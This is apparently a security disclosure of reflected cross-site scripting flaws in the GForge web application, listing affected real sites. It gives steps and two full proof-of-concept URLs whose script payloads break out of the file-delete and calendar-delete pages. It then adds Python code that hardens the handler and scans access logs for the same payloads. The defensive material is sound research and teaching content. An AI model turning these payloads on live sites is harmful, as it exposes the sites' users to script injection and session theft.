XSS in Gforge App ; Joomlacode.org, Stanford.edu,lbl.gov,etc.affected


The hacker "Sony" discovered a cross-site scripting (XSS) vulnerability in the GForge web application. GForge is a free-software fork of the web-based project-management and collaboration software originally created for SourceForge, called Savane. GForge provides project hosting, version control (CVS and Subversion), bug tracking, and messaging.

The hacker created two accounts for testing and found XSS in the files, calendar, message wall (search users), and blogs.


The Vulnerability Description:
XSS using Files:
After creating a fake account, upload a file.

It will be available at this location:
http://gforge.org/gf/user/eleo/userfiles/

Then press the Delete button, open the link in a new window, and append the XSS payload to the URL:

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[our xss is here]

PoC:
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


XSS in Calendar:

Open the calendar, press the "add new event" button, then press the Delete button, open the link in a new window, and append the XSS payload to the URL:

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[our xss is here]

PoC:
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
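Both PoCs above work the same way: an id or timestamp parameter is reflected into the delete-confirmation page without validation or encoding, so a quote and a script tag appended to the value break out of the markup. The following Python handler is an added illustration of the fix, not GForge's own (PHP) code; the parameter names come from the URLs above, while the action table, the `render_*` functions and the page template are assumptions made for the example. It rejects anything that is not a plain integer, escapes every value it does reflect, and passes data to inline script as a JSON literal instead of string concatenation.

```python
import html
import json
import re
from urllib.parse import urlsplit, parse_qs

# Integer parameters each delete action consumes (names taken from the PoC URLs above;
# the table itself is an assumption for this example).
INT_PARAMS = {
    "UserfileDelete": ("file_id",),
    "UsercalendarEventDelete": ("event_id", "start_date"),
}
DIGITS = re.compile(r"[0-9]{1,18}")

# Constructed query string in the same shape as the PoC above, shown already
# percent-decoded, which is how the application sees it.
POC_QUERY = ("action=UserfileDelete&file_id=3089';alert(String.fromCharCode(88,83,83))//"
             "--></SCRIPT>\"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>")


def render_vulnerable(action, raw_values):
    """The unsafe pattern: raw query values copied into an attribute and inline script."""
    name, raw = next(iter(raw_values.items()))
    return ('<a href="?action=%s&%s=%s">Delete</a>\n'
            "<script>var target = '%s';</script>" % (action, name, raw, raw))


def validate(params):
    """Return (action, {name: int}) or None if anything is missing or malformed."""
    action = params.get("action", [])
    if len(action) != 1 or action[0] not in INT_PARAMS:
        return None
    clean = {}
    for name in INT_PARAMS[action[0]]:
        values = params.get(name, [])
        # Exactly one value, digits only: quotes, semicolons, angle brackets,
        # signs and whitespace are all rejected before anything is rendered.
        if len(values) != 1 or not DIGITS.fullmatch(values[0]):
            return None
        clean[name] = int(values[0])
    return action[0], clean


def render_hardened(params):
    checked = validate(params)
    if checked is None:
        return 400, "<p>Invalid request.</p>"
    action, clean = checked
    # Validated ints cannot carry markup, but escaping is applied anyway so the
    # template stays safe if the schema is later loosened (defence in depth).
    attrs = "&amp;".join(
        "%s=%s" % (html.escape(k, quote=True), html.escape(str(v), quote=True))
        for k, v in clean.items())
    # Data for inline script goes in as a JSON literal, never concatenated into a string.
    data = json.dumps(clean)
    body = ('<a href="?action=%s&amp;%s">Delete</a>\n'
            "<script>var target = %s;</script>"
            % (html.escape(action, quote=True), attrs, data))
    return 200, body


def handle(url):
    """Parse the request URL and return (status, html body)."""
    return render_hardened(parse_qs(urlsplit(url).query, keep_blank_values=True))
```

`handle` returns HTTP 400 for the PoC query and 200 with correctly encoded output for a genuine `file_id` or `event_id`/`start_date` request; `render_vulnerable` shows, for contrast, the reflection pattern the PoCs exploit.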


The vulnerability affects the following sites: Joomlacode.org, Stanford.edu, lbl.gov, umich.edu, and other sites that use the GForge application.
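Administrators of an affected GForge instance can look for attempts against these endpoints in their web server logs. The scanner below is an added example written for this post, not a GForge or vendor tool; the three log lines are constructed in Apache combined format, with the two payload-bearing requests mirroring the shape of the PoC URLs above (one of them double-encoded) and the third a benign delete. It percent-decodes each query parameter repeatedly, so double encoding does not hide the payload, and flags script markers that have no business in an integer id or timestamp.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (Apache combined style). Line 1 is benign,
# line 2 carries a payload like the Files PoC, line 3 a double-encoded Calendar payload.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jan/2012:10:00:01 +0000] "GET /gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089 HTTP/1.1" 302 0
203.0.113.9 - - [29/Jan/2012:10:00:07 +0000] "GET /gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27%3Balert%28String.fromCharCode%2888,83,83%29%29//%3C/SCRIPT%3E%3CSCRIPT%3Ealert%281%29%3C/SCRIPT%3E HTTP/1.1" 200 4312
203.0.113.9 - - [29/Jan/2012:10:00:09 +0000] "GET /gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%2527%253Balert%25281%2529 HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Markers that should never appear in an id or timestamp parameter.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*script|alert\s*\(|string\.fromcharcode|javascript:|on\w+\s*=", re.I)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%2527) are seen as '."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded one layer; decode further layers ourselves.
        decoded = fully_decode(name) + "=" + fully_decode(raw)
        if XSS_MARKERS.search(decoded):
            return {"ip": m.group("ip"), "ts": m.group("ts"), "status": m.group("status"),
                    "param": fully_decode(name), "value": fully_decode(raw)}
    return None


def scan_log(text):
    """Scan every line of a log and return the list of findings in order."""
    return [hit for hit in (scan_line(l) for l in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%(ts)s %(ip)s status=%(status)s param=%(param)s value=%(value)r" % hit)
```

A 200 response to a request whose `file_id` or `start_date` contains a script tag is the signal to watch for: on a patched instance the request should be rejected rather than rendered.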
